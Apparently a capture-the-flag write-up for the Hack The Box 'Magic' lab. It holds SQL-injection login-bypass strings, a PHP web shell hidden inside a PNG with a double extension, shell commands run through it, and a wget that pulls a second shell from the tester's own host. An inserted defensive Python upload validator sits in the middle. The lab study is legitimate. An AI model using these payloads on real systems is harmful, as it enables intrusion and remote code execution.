2 :80
http://magic.htb/
webpage with images
$ gobuster dir -u http://magic.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/assets (Status: 301) [Size: 307] [--> http://magic.htb/assets/]
/images (Status: 301) [Size: 307] [--> http://magic.htb/images/]
/index.php (Status: 200) [Size: 4052]
/login.php (Status: 200) [Size: 4221]
/upload.php (Status: 302) [Size: 2957] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
http://magic.htb/login.php
login page
ran sqli.txt (auth-bypass wordlist) against the login form
success with
'or1=1-- -:pass
admin' #:pass
http://magic.htb/upload.php
can upload images
# tried .php
Sorry, only JPG, JPEG, PNG files are allowed
# method1: changed Content-Type in Burp to image/png -> FAILS
# method2: real .jpg magic bytes with shell code appended, uploaded as-is -> FAILS
# method3: real .jpg magic bytes with shell code, plus Content-Type changed in Burp -> FAILS
Using https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
# renaming with double extension >
$ cp /opt/imgs/5.png kashz.php.png
# editing with Sublime changed the file type to ASCII, so instead >
# using vi I modified the image and put the shell inside it, in the middle of the binary data: <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
$ file kashz.php.png
5.png: PNG image data, 263 x 277, 8-bit colormap, non-interlaced
# upload successful.
# based on the image URLs on the homepage, the path to uploaded images is magic.htb/images/uploads/<file>
magic.htb/images/uploads/kashz.php.png
# shows us garbled image-data
http://magic.htb/images/uploads/kashz.php.png?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
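Added defender-side example, not code from the writeup or the box: a stdlib-only Python upload validator that rejects each trick used above (a second extension like kashz.php.png, content that does not match the declared image type, a PHP open tag buried inside the image bytes) and picks a random server-side file name so the client never controls the stored path. Function names and the magic-byte table are my own.

```python
import re
import secrets
from pathlib import PurePosixPath

ALLOWED_EXT = {"jpg", "jpeg", "png"}
# Magic bytes for the allowed formats (table constructed for this example).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# Any PHP open tag inside the bytes means the file doubles as a script.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an upload.

    Checks the three things the upload page above did not check:
    1. every extension in the name, not just the last one (kashz.php.png),
    2. the file's magic bytes against the extension it claims,
    3. a PHP open tag anywhere in the content (the mid-file payload).
    """
    name = PurePosixPath(filename).name  # strip any directory component
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing basename or extension"
    for ext in parts[1:]:
        if ext not in ALLOWED_EXT:
            return False, f"extension '{ext}' not allowed"
    if not data.startswith(MAGIC[parts[-1]]):
        return False, "content does not match declared image type"
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Random server-side name: the client chooses neither the path nor
    the name written to disk, only which allowed extension it gets."""
    ext = PurePosixPath(filename).name.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"
```

Re-encoding every accepted image through an image library and serving the uploads directory with PHP execution disabled are the other two halves of the fix; the tag scan alone is a signature check, not a guarantee.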
# web shell using
http://magic.htb/images/uploads/kashz.php.png?cmd=wget%2010.10.16.5/web.php
> http://magic.htb/images/uploads/web.php
CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
Linux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux